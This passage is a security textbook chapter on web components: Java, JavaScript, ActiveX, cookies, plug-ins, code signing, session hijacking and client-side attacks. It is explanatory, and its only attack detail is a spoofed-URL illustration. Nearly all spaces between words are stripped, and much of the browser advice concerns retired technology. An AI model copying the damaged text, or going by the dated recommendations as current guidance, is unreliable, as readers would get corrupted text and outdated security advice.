CrossCheckDangersofSoftwareVulnerabilitiesErrorsinsoftwareleadtovulnerabilitiesassociatedwiththecodebeingrun.Thesevulnerabilitiesareexploitedbyhackerstoperformmaliciousactivityonamachine.Theseerrors
arefrequentlyrelatedtoweb-enabledprograms,astheInternetprovidesausefulconduitforhackerstoachieveaccesstoasystem.Theproblemofcodevulnerabilities,frombufferoverflows,toarithmeticoverflows,tocross-siterequestforgeries,cross-sitescripting,andinjectionattacks,isaseriousissuethathasmanyfaces.Itisnotedinthischapterbecausewebcomponentsareinvolved,butfulldetailsontheseverityofandstepstomitigatethisissueareinChapter18.Thenexttimeyouprovideinputtoaweb-basedapplication,thinkofwhatmaliciousactivityyoucouldperformontheserverinquestion.
JavaJavaisacomputerlanguageinventedbySunMicrosystemsasanalternativetoMicrosoft’sdevelopmentlanguages.Designedtobeplatform-independentandbasedonC,Javaofferedalowlearningcurveandawayofimplementingprogramsacrossanenterprise,independentofplatform.Althoughplatformindependenceneverfullymaterialized,andthepaceofJavalanguagedevelopmentwasslowedbySun,Javahasfounditselftobealeaderinobject-orientedprogramminglanguages.JavaoperatesthroughaninterpretercalledaJavaVirtualMachine
(JVM)oneachplatformthatinterpretstheJavacode,andthisJVMenablestheprogram’sfunctionalityforthespecificplatform.Java’srelianceonaninterpretivestephasledtoperformanceissues,andJavaisstillplaguedbypoorperformancewhencomparedtomostotherlanguages.SecuritywasoneofthetoutedadvantagesofJava,butinreality,securityisnotabuilt-infunctionbutanafterthoughtandisimplementedindependentlyofthelanguagecore.Thisallbeingsaid,properlycodedJavacanoperateatreasonablerates,andwhenproperlydesignedcanactinasecurefashion.ThesefactshaveledtothewidedependenceonJavaformuchoftheserver-sidecodingfore-commerceandotherweb-enabledfunctionality.ServerscanaddCPUstoaddressspeedconcerns,andthelowlearningcurvehasprovencostefficientforenterprises.
Javaisdesignedforsafety,reducingtheopportunityforsystemcrashes.Javacanstillperformmaliciousactivities,andthefactthatmanyusersfalselybelieveitissafeincreasesitsusefulnesstoattackers.
Javawasinitiallydesignedtobeusedintrustedenvironments,andwhenitmovedtotheInternetforgeneraluse,safetybecameoneofitsmuch-hypedbenefits.Javahasmanysafetyfeatures,suchastypecheckingandgarbagecollection,thatactuallyimproveaprogram’sabilitytorunsafelyonamachineandnotcauseoperatingsystem–levelfailures.Thisisolatestheuserfrommanycommonformsofoperatingsystemfaultsthatcanendinthe“bluescreenofdeath”inaWindowsenvironment,wheretheoperatingsystemcrashesandforcesarebootofthesystem.Safetyisnotsecurity,however,andalthoughsafe,amaliciousJavaprogramcanstillcausesignificantdamagetoasystem.Theprimarymodeofacomputerprogramistointeractwiththe
operatingsystemandperformfunctionaltasksforauser,suchasgettinganddisplayingdata,manipulatingdata,storingdata,andsoon.Althoughthesefunctionscanseembenign,whenenabledacrosstheWebtheycanhavesomeunintendedconsequences.Theabilitytoreaddatafromaharddriveanddisplayitonthescreenisessentialformanyprograms,butwhentheprogramisdownloadedandrunfromtheInternetandthedatais,withouttheknowledgeoftheuser,sentacrosstheInternettoanunauthorizeduser,thisenablesaprogramtospyonauserandstealdata.Writingdatatotheharddrivecanalsocausedeletionsiftheprogramdoesn’twritethedatawheretheuserexpects.SunrecognizedthesedangersandenvisionedthreedifferentsecuritypoliciesforJavathatwouldbeimplementedviathebrowserandJVM,providingdifferentlevelsofsecurity.ThefirstpolicyisnottorunJavaprogramsatall.ThesecondrestrictsJavaprogramfunctionalitywhentheprogramisnotrundirectlyfromthesystem’sharddrive—programsbeingdirectlyexecutedfromtheInternethavesevererestrictionsthatblockdiskaccessandforceothersecurity-relatedfunctionstobeperformed.ThelastpolicyrunsanyandallJavaprogramsaspresented.Mostbrowsersadoptedthesecondsecuritypolicy,restrictingJava
functionalityonaclientunlesstheprogramwasloadeddirectlyfromtheclient’sharddrive.Althoughthissolvedmanyproblemsinitially,italsoseverelylimitedfunctionality.Today,browsersallowmuchmorespecificgranularityonsecurityforJava,basedonsecurityzonesandusersettings.
JavaandJavaScriptarecompletelyseparateentities.JavaScriptdoesnotcreateappletsorstand-aloneapplications.JavaScriptresidesinsideHTMLdocuments,andcanprovidelevelsofinteractivitytowebpagesthatarenotachievablewithsimpleHTML.Javaisusedtocreateapplicationsthatruninavirtualmachineorbrowser.JavaScriptcodeisrunonabrowseronly.JavaScriptisnotpartoftheJavaenvironment.
JavaScriptJavaScriptisascriptinglanguagedevelopedbyNetscapeanddesignedtobeoperatedwithinabrowserinstance.JavaScriptworksthroughthebrowserenvironment.TheprimarypurposeofJavaScriptistoenablefeaturessuchasvalidationofformsbeforetheyaresubmittedtotheserver.EnterprisingprogrammersfoundmanyotherusesforJavaScript,suchasmanipulatingthebrowserhistoryfiles,nowprohibitedbydesign.JavaScriptactuallyrunswithinthebrowser,andthecodeisexecutedbythebrowseritself.Thishasledtocompatibilityproblems,andnotjustbetweenvendors,suchasMicrosoftandMozilla,butbetweenbrowserversions.SecuritysettingsinInternetExploreraredonebyaseriesofzones,allowingdifferinglevelsofcontrolover.NETfunctionality,ActiveXfunctionality,andJavafunctionality(seeFigure17.8).Unfortunately,thesesettingscanbechangedbyaTrojanprogram,alteringthebrowser(withoutalertingtheuser)andloweringthesecuritysettings.InFirefox,usingtheNoScriptplug-inisasolutiontothis,butthereducedfunctionalityleadstootherissues,asshowninFigure17.9,andrequiresmorediligentuserintervention.
•Figure17.8JavaconfigurationsettingsinInternetExplorer
•Figure17.9Securitysettingfunctionalityissues
AlthoughJavaScriptwasdesignednottobeabletoaccessfilesornetworkresourcesdirectly,exceptthroughthebrowserfunctions,ithasnotproventobeassecureasdesired.ThisfaulttracesbacktoasimilarfaultintheJavalanguage,wheresecuritywasaddedon,withoutthebenefitofacomprehensivesecuritymodel.So,althoughdesignersputthoughtandcommonsenseintothedesignofJavaScript,thelackofacomprehensivesecuritymodelleftsomesecurityholes.Forinstance,aformcouldsubmititselfviae-mailtoanundisclosedrecipient,eithereavesdropping,spamming,orcausingotherproblems—imagineyourmachinesendingdeaththreate-mailstohigh-levelgovernmentofficialsfromarogueJavaScriptimplementation.Further,mostbrowsersdonothaveamechanismtohaltarunning
script,shortofabortingthebrowserinstance,andeventhismaynotbepossibleifthebrowserhasstoppedrespondingtocommands.MaliciousJavaScriptscandomanythings,includingopeningtwonewwindowseverytimeyoucloseone,eachwiththecodetoopentwomore.Thereisnowayoutofthisone,shortofkillingthebrowserprocessfromthe
operatingsystem.
Manywebsitesmayhavebehaviorsthatusersdeemlessthandesirable,suchaspoppingopenadditionalwindows,eitherontop(pop-up)orunderneath(pop-under).Topreventthesebehaviors,aclassofappletreferredtoasapop-upblockermaybeemployed.Althoughtheymayblocksomedesiredpop-ups,mostpop-upblockershavesettingstoallowpop-upsonselectedsites.Theuseofapop-upblockerassistsinretainingstrictcontroloverbrowserbehaviorandenhancessecurityfortheuser.
JavaScriptscanalsotrickusersintothinkingtheyarecommunicatingwithoneentitywheninfacttheyarecommunicatingwithanother.Forexample,awindowmayopenaskingwhetheryouwanttodownloadandexecutethenewupdatefrom“http://www.microsoft.com..../update.exe,”andwhatiscoveredbytheellipsis(…)isactually“www.microsoft.com.attacker.org/”—theuserassumesthisisaMicrosoftaddressthatiscutshortbyspacerestrictionsonthedisplay.Asabrowserscriptinglanguage,JavaScriptisheretostay.Its
widespreadpopularityfordevelopingappletssuchasanimatedclocks,mortgagecalculators,andsimplegameswillovercomeitsbuggynatureandpoorlevelofsecurity.
ActiveXActiveXisthenamegiventoabroadcollectionofapplicationprogramminginterfaces(APIs),protocols,andprogramsdevelopedbyMicrosofttodownloadandexecutecodeautomaticallyoveranInternet-basedchannel.ThecodeisbundledtogetherintoanActiveXcontrolwithan.ocxextension.ThesecontrolsarereferencedinHTMLusingthe<object>tag.ActiveXisatoolfortheWindowsenvironmentandcanbeextremelypowerful.Itcandosimplethings,suchasenableabrowsertodisplayacustomtypeofinformationinaparticularway,anditcanalsoperformcomplextasks,suchasupdatetheoperatingsystemand
applicationprograms.ThisrangeofabilitiesgivesActiveXalotofpower,butthispowercanbeabusedaswellasusedforgoodpurposes.InternetExplorerhasseveraloptionstocontroltheexecutionofActiveXcontrols,asillustratedinFigure17.10.
•Figure17.10ActiveXsecuritysettingsinInternetExplorer
ToenablesecurityandconsumerconfidenceindownloadedprogramssuchasActiveXcontrols,MicrosoftdevelopedAuthenticode,asystemthatusesdigitalsignaturesandallowsWindowsuserstodeterminewhoproducedaspecificpieceofcodeandwhetherornotthecodehasbeenaltered.AsinthecaseofJava,safetyandsecurityaredifferentthings,andAuthenticodepromotesneitherinreality.Authenticodeprovideslimitedaccountabilityatthetimeofdownloadandprovidesreasonableassurancethatthecodehasnotbeenchangedsincethetimeofsigning.Authenticode
doesnotidentifywhetherapieceofcodewillcausedamagetoasystem,nordoesitregulatehowcodeisused,soaperfectlysafeActiveXcontrolunderonesetofcircumstancesmaybemaliciousifusedimproperly.Aswithanotary’ssignature,recourseisverylimited—ifcodeissignedbyaterroristorganizationandthecoderuinsyourmachine,allAuthenticodedidwasmakeitseemlegitimate.Itisstillincumbentupontheuserstoknowfromwhomtheyaregettingcodeandtodeterminewhetherornottheytrustthatorganization.
ExamTip:ActiveXtechnologycanbeusedtocreatecomplexapplicationlogicthatisthenembeddedintoothercontainerobjectssuchasawebbrowser.ActiveXcomponentshaveverysignificantcapabilitiesandthusmaliciousActiveXobjectscanbeverydangerous.AuthenticodeisameansofsigninganActiveXcontrolsothatausercanjudgetrustbasedonthecontrol’screator.
CriticsofAuthenticodeandothercode-signingtechniquesarenotagainstcodesigning,forthisisauniversallyrecognizedgoodthing.Whatthecriticsargueisthatcodesigningisnotapanaceaforsecurityissuesandthatmarketingitasdoingmorethanitreallydoesisirresponsible.Understandingthenuancesofsecurityisimportantintoday’shighlytechnicalworld,andleavingtheexplanationstomarketingdepartmentsisnottheidealsolution.
SecuringtheBrowserAgreatdealofdebateconcernstherelativesecurityissueofbrowserextensionsversustherichuserinteractionthattheyprovide.ThereisnodoubtthattherichnessoftheenvironmentofferedbyActiveXaddstotheuserexperience.Butasisthecaseinmostcodingsituations,addedfeaturesmeansweakersecurity,allotherthingsbeingconstant.Ifnothingelse,adevelopmentteammustspendsomeportionofitstimeonsecuredevelopmentpractices,timethatsomedevelopersandmarketerswould
prefertospendonnewfeatures.Althoughnobrowseris100percentsafe,theuseofFirefoxcoupledwiththeNoScriptplug-incomestheclosesttofittingthebill.FirefoxwillnotexecuteActiveX,sothatthreatvectorisremoved.TheNoScriptplug-inallowstheusertodeterminefromwhichdomainstotrustscripts.TheuseofNoScriptputstheonusbackontheuserastowhichdomainscriptstheychoosetotrust,andalthoughit’snotperfectfromasecurityperspective,thisatleastallowsameasureofcontroloverwhatcodeyouwanttorunonyourmachine.
CGITheCommonGatewayInterface(CGI)wastheoriginalmethodforhavingawebserverexecuteaprogramoutsidethewebserverprocess,yetonthesameserver.CGIofferedmanyadvantagestoweb-basedprograms.Theprogramscanbewritteninanumberoflanguages,althoughPerlisafavorite.Thesescriptedprogramsembracethefullfunctionalityofaserver,allowingaccesstodatabases,UNIXcommands,otherprograms,andsoon.Thisprovidesawiderangeoffunctionalitytothewebenvironment.Withthisunrestrainedcapability,however,comesecurityissues.Poorlywrittenscriptscancauseunintendedconsequencesatruntime.Theproblemwithpoorlywrittenscriptsisthattheirdefectsarenotalwaysobvious.Sometimesscriptsappeartobefine,butunexpecteduserinputscanhaveunintendedconsequences.CGIisanoutdated,andforthemostpartretired,technology.Ithasbeen
replacedbynewerscriptingmethods.
Server-SideScriptsCGIhasbeenreplacedinmanywebsitesthroughnewerserver-sidescriptingtechnologiessuchasJava,ActiveServerPages(ASP),ASP.NET,andPHP.AllthesetechnologiesoperateinmuchthesamefashionasCGI:theyallowprogramstoberunoutsidethewebserverandtoreturndatatothewebservertobeservedtoendusersviaawebpage.
Thetermserver-sidescriptisactuallyamisnomer,astheseareactuallyexecutableprogramsthatareeitherinterpretedorruninvirtualmachines.Eachofthesenewertechnologieshasadvantagesanddisadvantages,butallofthemhavestrongersecuritymodelsthanCGI.Withthesesecuritymodelscomereducedfunctionalityand,aseachisbasedonadifferentlanguage,asteeperlearningcurve.Still,theneedforadherencetoprogrammingfundamentalsexistsinthesetechnologies—codemustbewelldesignedandwellwrittentoavoidthesamevulnerabilitiesthatexistinallformsofcode.Bufferoverflowsarestillanissue.Changinglanguagesortechnologiesdoesnoteliminatethebasicsecurityproblemsassociatedwithincorporatingopen-endeduserinputintocode.Understandingandqualifyinguserresponsesbeforeblindlyusingthemprogrammaticallyisessentialtothesecurityofasystem.
CookiesCookiesaresmallchunksofASCIItextpassedwithinanHTTPstreamtostoredatatemporarilyinawebbrowserinstance.InventedbyNetscape,cookiespassbackandforthbetweenwebserverandbrowserandactasamechanismtomaintainstateinastatelessworld.Stateisatermthatdescribesthedependenceonpreviousactions.Bydefinition,HTTPtrafficservedbyawebserverisstateless—eachrequestiscompletelyindependentofallpreviousrequests,andtheserverhasnomemoryofpreviousrequests.Thisdramaticallysimplifiesthefunctionofawebserver,butitalsosignificantlycomplicatesthetaskofprovidinganythingbutthemostbasicfunctionalityinasite.Cookiesweredevelopedtobridgethisgap.CookiesarepassedalongwithHTTPdatathroughaSet-CookiemessageintheheaderportionofanHTTPmessage.
Cookiescomeintwotypes,sessionandpersistent.Sessioncookieslastonlyduringawebbrowsingsessionwithawebsite.Persistentcookiesarestoredontheuser’sharddriveandlastuntilanexpirationdate.
Acookieisactuallyaseriesofname-valuepairsthatisstoredinmemoryduringabrowserinstance.Thespecificationforcookiesestablishedseveralspecificname-valuepairsfordefinedpurposes.Additionalname-valuepairsmaybedefinedatwillbyadeveloper.Thespecifiedsetofname-valuepairsincludesthefollowing:
ExpiresThisfieldspecifieswhenthecookieexpires.Ifnovalueexists,thecookieisgoodonlyduringthecurrentbrowsersessionandwillnotbepersistedtotheuser’sharddrive.Shouldavaluebegiven,thecookiewillbewrittentotheuser’smachineandpersisteduntilthisdatetimevalueoccurs.
DomainSpecifiesthedomainwherethecookieisused.Cookiesweredesignedasmemory-residentobjects,butastheuserordatacancauseabrowsertomovebetweendomains—say,fromcomedy.nettojokes.org—somemechanismneedstotellthebrowserwhichcookiesbelongtowhichdomains.
PathThisname-valuepairfurtherresolvestheapplicabilityofthecookieintoaspecificpathwithinadomain.Ifpath=/directory,thecookiewillbesentonlyforrequestswithin/directoryonthegivendomain.Thisallowsalevelofgranularcontrolovertheinformationbeingpassedbetweenthebrowserandserver,anditlimitsunnecessarydataexchanges.
SecureThepresenceofthekeyword[secure]inacookieindicatesthatitistobeusedonlywhenconnectedinanSSL/TLSsession.Thisdoesnotindicateanyotherformofsecurity,ascookiesarestoredinplaintextontheclientmachine.Cookiemanagementonabrowserisnormallyaninvisibleprocess,butmostbrowsershavemethodsforuserstoexamineandmanipulatecookiesontheclientside.Chromeuserscanexamine,delete,andblockindividualcookiesthroughtheinterfaceshowninFigure17.11.InternetExplorerhasasimilarinterface,withjustaDeleteoptioninthebrowserunderBrowsingHistory(seeFigure17.12).Additionalcookiemanipulationcanbe
donethroughthefileprocessingsystem,becausecookiesarestoredasindividualfiles,asshowninFigure17.13.Thiscombinationallowseasierbulkmanipulation,whichisausefuloption,ascookiescanbecomequitenumerousinshortorder.
•Figure17.11Chromecookiemanagement
•Figure17.12InternetExplorercookiemanagement
•Figure17.13InternetExplorercookiestore
Sowhatgoodarecookies?Disablecookiesinyourbrowserandgotosomecommonsitesthatyouvisit,andyou’llquicklylearntheusefulnessofcookies.Cookiesstoreavarietyofinformation,fromcustomerIDstodataaboutpreviousvisits.Becausecookiesarestoredonauser’smachine
inaformthatwillallowsimplemanipulation,theymustalwaysbeconsideredsuspectandarenotsuitableforuseasasecuritymechanism.Theycan,however,allowthebrowsertoprovidecrucialpiecesofinformationtoawebserver.Advertiserscanusethemtocontrolwhichadsyouareshown,basedonpreviousadsyouhaveviewedandregardlessofadlocationbysite.Specificsitescanusecookiestopassstateinformationbetweenpages,enablingfunctionalityattheuser’sdesiredlevels.CookiescanalsorememberyourZIPcodeforaweathersite,yourIDforastocktrackersite,theitemsinyourshoppingcart—thesearealltypicalcookieuses.Inthefinalanalysis,cookiesareapartofthedailywebexperience,heretostayandusefulifnotusedimproperly(suchastostoresecuritydataandtoprovideIDandauthentication).
DisablingCookiesIftheuserdisablescookiesinabrowser,thistypeofinformationwillnotbeavailableforthewebservertouse.IETFRFC2109describestheHTTPstate-managementsystem(cookies)andspecifiesseveralspecificcookiefunctionstobeenabledinbrowsers,specifically:
Theabilitytoturnonandoffcookieusage
Anindicatorastowhethercookiesareinuse
Ameansofspecifyingcookiedomainvaluesandlifetimes
Severalofthesefunctionshavealreadybeendiscussed,buttosurfcookie-freerequiresmorethanasimplestep.TellingabrowsertostopacceptingcookiesisasetupoptionavailablethroughanOptionsmenu,butthishasnoeffectoncookiesalreadyreceivedandstoredonthesystem.Topreventthebrowserfromsendingcookiesalreadyreceived,theusermustdeletethecookiesfromthesystem.Thisbulkoperationiseasilyperformed,andthenthebrowsercanruncookie-free.Severalthird-partytoolsenableevenafinergranularityofcookiecontrol.
BrowserPlug-insTheadditionofbrowserscriptingandActiveXcomponentsallowsabrowsertochangehowithandlesdata,tremendouslyincreasingitsfunctionalityasauserinterface.Butalldatatypesandalldesiredfunctionalitycannotbeofferedthroughtheseprogrammingtechnologies.Plug-insareusedtofillthesegaps.Plug-insaresmallapplicationprogramsthatincreaseabrowser’sability
tohandlenewdatatypesandaddnewfunctionality.Sometimestheseplug-insareintheformofActiveXcomponents,whichistheformMicrosoftchoseforitsOfficeplug-in,whichenablesabrowsertomanipulatevariousOfficefiles,suchaspivottablesfromExcel,overtheWeb.AdobehasdevelopedAcrobatReader,aplug-inthatenablesabrowsertoreadanddisplayPortableDocumentFormat(PDF)filesdirectlyinabrowser.PDFfilesofferplatformindependenceforprinteddocumentsandareusableacrossawidearrayofplatforms—theyareacompactwaytoprovideprintedinformation.Figure17.14illustratesthevariousplug-insandbrowserhelperobjects(discussedinthenextsection)enabledinInternetExplorer.
•Figure17.14Add-onsforInternetExplorer
Thecombinationofadevelopmentenvironmentfordevelopersandplug-in–enabledbrowsersthatcandisplaythecontenthascausedthesetechnologiestoseewidespreaduse.Theresultisatremendousincreaseinvisualrichnessinwebcommunications,andthis,inturn,hasmadetheWebmorepopularandhasincreasedusageinvariousdemographicsegments.Untilrecently,theseplug-inshavehadaremarkablesafetyrecord.As
Flash-basedcontenthasgrownmorepopular,crackershaveexaminedtheFlashplug-insandsoftware,determinedvulnerabilities,anddevelopedexploitcodetouseagainsttheFlashprotocol.Adobehaspatchedtheissue,butasApplehasdecidednottouseFlashonitsiPhonesoriPads,thedeathofFlashisonthehorizon.
MaliciousAdd-onsAdd-onsarepiecesofcodethataredistributedtoallowadditionalfunctionalitytobeaddedtoanexistingprogram.Anexampleofthesearebrowserhelperobjects(BHOs),whichprovideameansofcreatingaplug-inmodulethatisloadedwithInternetExplorerandprovideameansofaddingcapabilitytothebrowser.Thefunctionalitycanbesignificant,asinthecaseoftheAdobeAcrobatBHOthatallowsPDFstoberenderedinthebrowser.ABHOhasunrestrictedaccesstotheInternetExplorereventmodelandcandothingssuchascapturekeystrokes.
TechTip
BrowserMalwareThecircumventionofbrowserfunctionalityisacommonformofmalware.Browsermalwareexploitssecurityvulnerabilitiesinthebrowseritself,itsextensions,andplug-ins.
Otherprogramscanhaveadd-onsthatutilizethepermissionsgiventhemasterprogram.Youshouldonlyuseadd-onsfromtrustedsources,andyouneedtounderstandthelevelofinteractionrisktheypose.ActiveXisatechnologyimplementedbyMicrosofttoenhanceweb-enabledsystemsthroughsignificantadditionstousercontrols.Forexample,unlesssignedbyatrustedauthorityusingAuthenticode,ActiveXcontentshouldnotbeallowedinbrowsers,asthenatureofthecodechangescanpresentsignificantrisk.
SignedAppletsCodesigningwasanattempttobringthesecurityofshrink-wrappedsoftwaretosoftwaredownloadedfromtheInternet.Codesigningworksbyaddingadigitalsignatureandadigitalcertificatetoaprogramfiletodemonstratefileintegrityandauthenticity.Thecertificateidentifiestheauthor,andthedigitalsignaturecontainsahashvaluethatcoverscode,certificate,andsignaturetoproveintegrity,andthisestablishestheintegrityofthecodeandpublisherviaastandardbrowsercertificatecheck.Thepurposeofacompanysigningthecodeistostatethatitconsidersthecodeitcreatedtobesafe,anditisstatingthatthecodewillnotdoanyharmtothesystem(tothecompany’sknowledge).Thedigitalsignaturealsotellstheuserthatthestatedcompanyis,indeed,thecreatorofthecode.Theabilitytouseacertificatetosignanappletoracontrolallowsthe
identityoftheauthorofacontrolorapplettobeestablished.Thishasmanybenefits.Forinstance,ifausertrustscontentfromaparticularvendor,suchasSunMicrosystems,theusercantrustcontrolsthataresignedbySunMicrosystems.Thissigningofapieceofcodedoesnotdoanythingotherthanidentifythecode’smanufacturerandguaranteethatthecodehasnotbeenmodifiedsinceitwassigned.Asignedappletcanbehijackedaseasilyasagraphicoranyotherfile.
Thetwowaysanattackercouldhijackasignedcontrolarebyinlineaccessorbycopyingthefileinitsentiretyandrepublishingit.Inliningisusing
anembeddedcontrolfromanothersitewithorwithouttheothersite’spermission.RepublishingasignedcontrolisdonemuchlikestealingaGIForJPEGimage—acopyofthefileismaintainedontheunauthorizedsiteandservedfromthereinsteadoffromtheoriginallocation.Ifasignedcontrolcannotbemodified,whybeconcernedwiththesethefts,apartfromtheissueofintellectualproperty?Theprimarysecurityconcerncomesfromhowthecontrolisused.Acrackermaybeabletouseacontrolinanunintendedfashion,resultinginfilelossorbufferoverflow—conditionsthatweakenasystemandcanallowexploitationofothervulnerabilities.Acommonprogrammingactivityiscleaningupinstallationfilesfromacomputer’sharddriveaftersuccessfullyinstallingasoftwarepackage.Ifasignedcontrolisusedforthistaskandpermissionhasalreadybeengranted,thenimproperlyusingthecontrolcouldresultinthewrongsetoffilesbeingdeleted.Thecontrolwillstillfunctionasdesigned,buttheissuebecomeswhoitisusedbyandhow.Theseareconcernsnotaddressedsimplybysigningacontrolorapplet.
Application-BasedWeaknessesWebbrowsersarenottheonlyaspectofsoftwarebeingabusedbycrackers.Theapplicationsoftwarewrittentorunonserversandserveupthecontentforusersisalsoatarget.Webapplicationsecurityisafairlyhottopicinsecurity,asithasbecomeaprimetargetforprofessionalcrackers.Criminalhackerstypicallyareaftersomeformoffinancialreward,whetherfromstolendata,stolenidentity,orsomeformofextortion.Attackingweb-basedapplicationshasproventobealucrativeventureforseveralreasons.First,thetargetisarichenvironment,ascompanyaftercompanyhasdevelopedacustomer-facingwebpresence,oftenincludingcustom-codedfunctionalitythatpermitscustomeraccesstoback-endsystemsforlegitimatebusinesspurposes.Second,buildingthesecustomapplicationstohighlevelsofsecurityisadifficultifnotimpossiblefeat,especiallygiventhecorporatepressureondeliverytimeandcost.
CrossCheckCommonApplicationVulnerabilitiesTherearesomecommonapplicationvulnerabilitiesthathackersusetoattackwebsites,includinginjectionattacks,cross-siterequestforgeries,cross-sitescriptingattacks,andnumericattacks.Theseareattacksthatusethebrowser’sabilitytosubmitinputtoaback-endserverprogram,andtheytakeadvantageofcodingerrorsontheback-endsystem,enablingbehavioroutsidethedesiredprogramresponse.TheseerrorsarecoveredinmoredetailinChapter18,astheyarefundamentallyprogrammingerrorsontheserverside.
Thesameprogrammaticerrorsthatplagueoperatingsystems,suchasbufferoverflows,cancausehavocwithweb-basedsystems.Butweb-basedsystemshaveanewhistoryofrichcustomerinteractions,includingthecollectionofinformationfromthecustomeranddynamicallyusingcustomer-suppliedinformationtomodifytheuserexperience.Thismakesthecustomerapartoftheapplication,andwhenpropercontrolsarenotinplace,errorssuchastheMySpace-basedSamywormcanoccur.Differenttypesoferrorsarecommonlyobservedinthedeploymentofwebapplications,andthesehavebeencategorizedintosixlogicalgroupingsofvulnerabilities:authentication,authorization,logicalattacks,informationdisclosure,commandexecution,andclient-sideattacks.Atotalof24differenttypesofvulnerabilitieshavebeenclassifiedbytheWebApplicationSecurityConsortium(WASC),aninternationalorganizationthatestablishesbestpracticesforwebapplicationsecurity.Thechangingnatureoftheweb-basedvulnerabilitiesisdemonstratedby
thechangingoftheOWASPTopTenlistofwebapplicationvulnerabilitiesmaintainedbyTheOpenWebApplicationSecurityProject.OWASPisaworldwidefreeandopencommunityfocusedonimprovingthesecurityofapplicationsoftwareandhaspublishedaseriesofTopTenvulnerabilitylistshighlightingthecurrentstateoftheartandthreatenvironmentfacingwebapplicationdevelopers.OWASPmaintainsawebsite(www.owasp.org)withsignificantresourcestohelpfirmsbuildbettersoftwareandeliminatethesecommonandpervasiveproblems.Thetruechallengeinthisareaisnotjustaboutcoding,butalsoaboutdevelopingan
understandingofthenatureofwebapplicationsandthedifficultyofusinguser-suppliedinputsforcrucialaspectsinarich,userexperience–basedwebapplication.TheerrorsincludedintheOWASPTopTenlisthaveplaguedsomeofthelargestsitesandthosewitharguablythebesttalent,includingAmazon,eBay,MySpace,andGoogle.
SessionHijackingWhencommunicatingacrosstheWeb,itiscommontocreateasessiontocontrolcommunicationflows.Sessionscanbeestablishedandcontrolledusingavarietyofmethods,includingSSL/TLSandcookies.Itisimportanttosecurelyimplementthesetupandteardownofasession,forifonepartyendsthecommunicationwithoutproperlytearingdownthecommunicationsession,aninterlopercantakeoverthesession,continueafteroneofthepartieshasleft,andimpersonatethatparty.Ifyoulogintoyourbanktoconducttransactions,butallowasessionhijackerin,thenthehijackercancontinuebankingafteryouleave,usingyouraccount.Thisisoneofthereasonsitissoimportanttologoffofbankingandfinancialsites,ratherthanjustclosingthebrowser.Therearenumerousmethodsofsessionhijacking,fromman-in-the-
middleattackstoside-jackingandbrowsertakeovers.Side-jackingistheuseofpacketsniffingtostealasessioncookie.SecuringonlythelogonprocessandthenswitchingbacktostandardHTTPcanenablethisattackmethodology.Thebestdefensesaretouseencryptioncorrectly(TLS,notSSL)andto
logoutofandcloseapplicationswhendone.Whenusingmultitabbedbrowsers,itisbesttoclosetheentirebrowserinstance,notjustthetab.
Client-SideAttacksThewebbrowserhasbecomethemajorapplicationforuserstoengageresourcesacrosstheWeb.Thepopularityandtheutilityofthisinterfacehavemadethewebbrowseraprimetargetforattackerstogainaccessand
controloverasystem.Awidevarietyofattackscanoccurviaabrowser,typicallyresultingfromafailuretoproperlyvalidateinputbeforeuse.Unvalidatedinputcanresultinaseriesofinjectionattacks,headermanipulation,andotherformsofattack.
Cross-SiteScriptingAcross-sitescriptingattackisacodeinjectionattackinwhichanattackersendscodeinresponsetoaninputrequest.Thiscodeisthenrenderedbythewebserver,resultingintheexecutionofthecodebythewebserver.Cross-sitescriptingattackstakeadvantageofafewcommonelementsinweb-basedsystems.Cross-sitescriptingiscoveredindetailinChapter18.
HeaderManipulationsWhenHTTPisbeingdynamicallygeneratedthroughtheuseofuserinputs,unvalidatedinputscangiveattackersanopportunitytochangeHTTPelements.Whenuser-suppliedinformationisusedinaheader,itispossibletocreateavarietyofattacks,includingcachepoisoning,cross-sitescripting,cross-userdefacement,pagehijacking,cookiemanipulation,andopenredirect.
ExamTip:Awidevarietyofattackvectorscanbeusedagainstaclientmachine,includingcachepoisoning,cross-sitescripting,cross-userdefacement,pagehijacking,cookiemanipulation,andopenredirect.Allattacksshouldbeknownfortheexam.
Web2.0andSecurityArelativelynewphenomenonhasswepttheInternet,Web2.0,acollectionoftechnologiesthatisdesignedtomakewebsitesmoreusefulforusers.Fromnewlanguagesandprotocols,suchasAJAX,touser-providedcontent,tosocialnetworkingsitesanduser-createdmash-ups,theInternethaschangeddramaticallyfromitsstaticHTMLroots.Thereisa
widerangeofsecurityissuesassociatedwiththisnewlevelofdeployedfunctionality.Thenewlanguagesandprotocolsaddsignificantlayersofcomplexityto
awebsite’sdesign,anderrorscanhavesignificantconsequences.EarlyeffortsbyGoogletoaddWeb2.0functionalitytoitsapplicationscreatedholesthatallowedhackersaccesstoalogged-inuser’sGmailaccountandpassword.Googlehasfixedtheseerrors,buttheyillustratethedangersofrushingintonewfunctionalitywithoutadequatetesting.ThefinedetailsofWeb2.0securityconcernsarefartoonumeroustodetailhere—infact,theycouldcomprisetheirownbook.TheimportantthingtorememberisthatthefoundationsofsecurityapplythesamewayinWeb2.0astheydoelsewhere.Infact,withmorecapabilityandgreatercomplexitycomesagreaterneedforstrongfoundationalsecurityefforts,andWeb2.0isnoexception.
Chapter17Review
LabManualExerciseThefollowinglabexercisesfromthecompanionlabmanual,PrinciplesofComputerSecurityLabManual,FourthEdition,providespracticalapplicationofmaterialcoveredinthischapter:Lab5.2mWebBrowserExploits
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingaboutwebcomponents.
DescribethefunctioningoftheSSL/TLSprotocolsuite
SSLandTLSuseacombinationofsymmetricandasymmetriccryptographicmethodstosecuretraffic.
BeforeanSSLsessioncanbesecured,ahandshakeoccurstoexchangecryptographicinformationandkeys.
Explainwebapplications,plug-ins,andassociatedsecurityissues
Webbrowsershavemechanismstoenableplug-inprogramstomanageapplicationssuchasFlashobjectsandvideos.
FirefoxhasaNoScripthelperthatblocksscriptsfromfunctioning.
Plug-insthatblockpop-upwindowsandphishingsitescanimproveend-usersecuritybypermittinggreatercontroloverbrowserfunctionality.
Describesecurefiletransferoptions
FTPoperationsoccurinplaintext,allowinganyonewhoseesthetraffictoreadit.
SFTPcombinesthefiletransferapplicationwiththeSecureShell(SSH)applicationtoprovideforameansofconfidentialFTPoperations.
Explaindirectoryusagefordataretrieval
LDAPisaprotocoldescribinginteractionwithdirectoryservices.
Directoryservicesaredatastructuresoptimizedforretrievalandarecommonlyusedwheredataisreadmanytimesmorethanwritten,suchasACLs.
ExplainscriptingandotherInternetfunctionsthatpresentsecurityconcerns
Scriptsarepiecesofcodethatcanexecutewithinthebrowser
environment.
